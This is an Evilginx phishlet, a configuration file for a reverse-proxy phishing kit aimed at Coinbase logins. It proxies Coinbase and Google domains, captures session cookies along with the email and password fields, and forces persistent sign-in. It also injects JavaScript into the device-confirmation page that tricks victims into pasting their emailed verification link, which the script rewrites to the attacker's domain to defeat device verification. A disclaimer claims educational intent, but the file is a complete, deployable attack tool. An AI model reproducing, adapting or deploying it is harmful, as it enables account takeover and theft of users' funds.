# AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. # PLEASE DO NOT MISUSE THIS PHISHLET. # Don't Forget To set "domain" Params to your domain name (example.com)... # # Use This Command To set the domain params from the evilginx command line. # Where ID is lure id number, and EXAMPLE.COM is your domain name. # lures edit params ID domain=EXAMPLE.COM author: '@An0nud4y' min_ver: '2.3.0' proxy_hosts: - {phish_sub: 'www', orig_sub: 'www', domain: 'coinbase.com', session: true, is_landing: true} - {phish_sub: 'ws', orig_sub: 'ws', domain: 'coinbase.com', session: true, is_landing: false} - {phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: true, is_landing: false} - {phish_sub: 'googletag', orig_sub: 'www', domain: 'googletagmanager.com', session: true, is_landing: false} - {phish_sub: '', orig_sub: '', domain: 'coinbase.com', session: true, is_landing: false} - {phish_sub: 'assets', orig_sub: 'assets', domain: 'coinbase.com', session: true, is_landing: false} - {phish_sub: 'dynamic', orig_sub: 'dynamic-assets', domain: 'coinbase.com', session: true, is_landing: false} - {phish_sub: 'cdn', orig_sub: 'cdn', domain: 'ravenjs.com', session: true, is_landing: false} - {phish_sub: 'sessions', orig_sub: 'sessions', domain: 'coinbase.com', session: true, is_landing: false} - {phish_sub: 'events', orig_sub: 'events-service', domain: 'coinbase.com', session: true, is_landing: false} - {phish_sub: 'exceptions', orig_sub: 'exceptions', domain: 'coinbase.com', session: true, is_landing: false} - {phish_sub: 'images', orig_sub: 'images', domain: 'coinbase.com', session: true, is_landing: false} sub_filters: # USED SUBFILTER TO INJECT THE JAVASCRIPT IN HTML PAGE TO MODIFY THE PAGE DYNAMICALLY. # (Javascript is obfuscated due to fix the syntax issues , complete js code is available below in inject_js as well) - {triggers_on: 'www.coinbase.com', orig_sub: '', domain: 'coinbase.com',search: '',replace: "" ,mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript'] ,with_params: ['/device_confirmations/new']} - {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: 'assets', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: 'assets', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: 'dynamic-assets', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: 'dynamic-assets', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: 'sessions', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: 'sessions', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: 'events-service', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: 'events-service', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: 'exceptions', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: 'exceptions', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: 'images', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: 'images', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: '', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: '', domain: 'coinbase.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: 'ws', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: 'ws', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'google.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'googletagmanager.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'googletagmanager.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} auth_tokens: - domain: 'www.coinbase.com' keys: ['.*,regexp'] auth_urls: - '/dashboard' - '/dashboard/.*' credentials: username: key: 'email' search: '(.*)' type: 'post' password: key: 'password' search: '(.*)' type: 'post' force_post: - path: '/sessions' search: - {key: 'email', search: '.*'} - {key: 'password', search: '.*'} force: - {key: 'stay_signed_in', value: '1'} type: 'post' - path: '/signin_step_two' search: - {key: 'token', search: '.*'} - {key: 'phone_number_id', search: '.*'} force: - {key: 'remember_computer', value: '1'} type: 'post' login: domain: 'www.coinbase.com' path: '/signin' # "function lp()" will dynamically replace the contents in device authentication html page, and will create a new input box and button. Some other replacements are just to make page look better. # "function ValidateLink()" will replace the pdomain name 'coinbase.com' with the evilginx server domain name to verify the device from the IP of evilginx server, and will popup a new window with that modified auth link. # In that way we will be able to successfully authenticate the new device login. # "function hcaptcha()" will replace the domain name during the captcha validation to decrease the possibility of getting caught by the user. js_inject: - trigger_domains: ["www.coinbase.com"] trigger_paths: ["/device_confirmations/new"] trigger_params: [domain] script: | window.onload = function() { lp0(); } function lp0() { try { lp() } catch (err) { setTimeout(lp, 100); } }; function lp(){ var elem1 = document.getElementsByClassName("account-inner")[0]; elem1.parentNode.removeChild(elem1); var elem2 = document.getElementsByClassName("device-support")[0]; elem2.parentNode.removeChild(elem2); var div = document.createElement('div'); div.className = 'account-inner'; div.innerHTML = `

Authorize This Login

Copy The Verification Link Received in Email And Paste It Below To Verify The Login

`; document.getElementsByClassName("account-form device-confirmation")[0].appendChild(div); var div = document.createElement('div'); div.className = 'device-support'; div.innerHTML = `

Email didn't arrive?

Visit our Support Center.

I no longer have access to my email address

`; document.getElementsByClassName("account-form device-confirmation")[0].appendChild(div); return; } function ValidateLink(){ var domain = "{domain}" var link1 = document.getElementById("linkVerify").value; var link2 = link1.replace('coinbase.com', domain); console.log(link2) window.open(link2, '_blank').focus(); } setTimeout(function(){ lp(); }, 3500); # HCAPTCHA Header That shows domain name can be Replaced dynamically with javascripts, Its Disabled Here Because Its resulting in Hcaptcha error, Find your ways to solve it. # # - trigger_domains: ["www.coinbase.com"] # trigger_paths: ["/signin","/signin*"] # trigger_params: [] # script: | # function hcaptcha(){ # var elem = document.getElementsByClassName("cf-subheadline")[0]; # elem.parentNode.removeChild(elem); # var div = document.createElement('div'); # div.className = 'cf-subheadline'; # div.innerHTML = ` #

Please complete the security check to get access to Coinbase Website

# `; # document.getElementsByClassName("cf-wrapper cf-header cf-error-overview")[0].appendChild(div); # return; # }